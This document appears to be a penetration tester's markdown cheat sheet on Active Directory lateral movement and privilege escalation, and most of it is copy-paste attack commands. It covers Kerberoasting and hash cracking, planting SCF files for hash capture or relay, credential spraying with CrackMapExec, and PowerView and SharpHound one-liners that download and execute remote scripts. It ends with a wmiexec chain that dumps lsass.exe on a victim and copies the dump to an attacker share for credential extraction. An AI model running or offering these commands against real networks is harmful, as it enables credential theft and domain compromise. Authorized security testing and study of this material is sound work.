Skip to content

Latest commit

 

History

History
98 lines (49 loc) · 3.32 KB

6 - Lateral-Movement-and-Privilege-Escalation.md

File metadata and controls

98 lines (49 loc) · 3.32 KB

Kerberoast

From Linux:

Get hashes using impacket

GetUserSPNs.py -request -save -dc-ip <IP> domain/user

From Windows:

RiskySPN: https://github.com/cyberark/RiskySPN

Crack:

Hashcat:

hashcat1 -m 13100 -r rules/<rule> <hashes file> wordlists/<wordlist>

Plant SCF files on file shares to get hashes or SMB relay

Find shares:

Invoke-ShareFinder

powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’);Invoke-ShareFinder"

CrackMapExec --shares module, grep output for WRITE.

Plant scf file on share using cme --scuffy module:

Use Metasploit SMB server module or Responder to capture/crack or relay hashes.

Spray creds for admin access using CrackMapExec

cme smb [/path/to/FileWithIPsOrNetworks] -u [username] -p [password] | tee /path/to/logfile.log

Note: If using a local account, add the --local-auth option. If using a hash instead of password, use -H [hash] instead of -p.

PowerView

Invoke-UserHunter

All Domain Admins:

powershell -exec bypass -c IEX (iwr 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-UserHunter -CheckAccess

Single User:

powershell -exec bypass -c IEX (iwr 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-UserHunter -UserName <username> -CheckAccess

Invoke-ShareFinder

powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’);Invoke-ShareFinder"

Find all members of a group

powershell -exec bypass -c "IEX (New-Object Net.Webclient).downloadstring('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1’);Invoke-UserHunter -GroupName <group>"

BloodHound

Installation and walkthrough

https://www.pentestpartners.com/security-blog/bloodhound-walkthrough-a-tool-for-many-tradecrafts/

Collection

powershell -exec bypass -c IEX (iwr 'https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-Bloodhound -CollectionMethod all

PrivExchange

Exchange your privileges for Domain Admin privs by abusing Exchange: https://github.com/dirkjanm/privexchange/

Find Domain Admin sessions and dump credentials

powershell -exec bypass -c IEX (iwr 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1');Invoke-UserHunter -CheckAccess

Note: I don't use Mimikatz on production systems. I dump lsass.exe and use Mimikatz on a system that I control to dump creds from the dump file.

Requires Impacket and pypykatz

Install pypykatz:

pip3 install pypykatz

Run Impacket smbserver.py:

./smbserver.py <share name> <path to directory where you have procdump64.exe>

Run Impacket wmiexec.py:

./wmiexec.py <domain>/<username>:<password>@<Victim IP> 'copy \\<PTK IP>\<share>\procdump64.exe . & procdump64.exe -accepteula -64 -ma lsass.exe lsass.dmp & copy lsass.dmp \\<PTK IP>\<share>\ & del lsass.dmp & del procdump64.exe'

Dump credentials from lsass dump file

pypykatz minidump lsass.dmp

Note: Sometimes you may get an error when using pypykatz. In that case you'll have to copy the dump file to a Windows system under your control and use Mimikatz.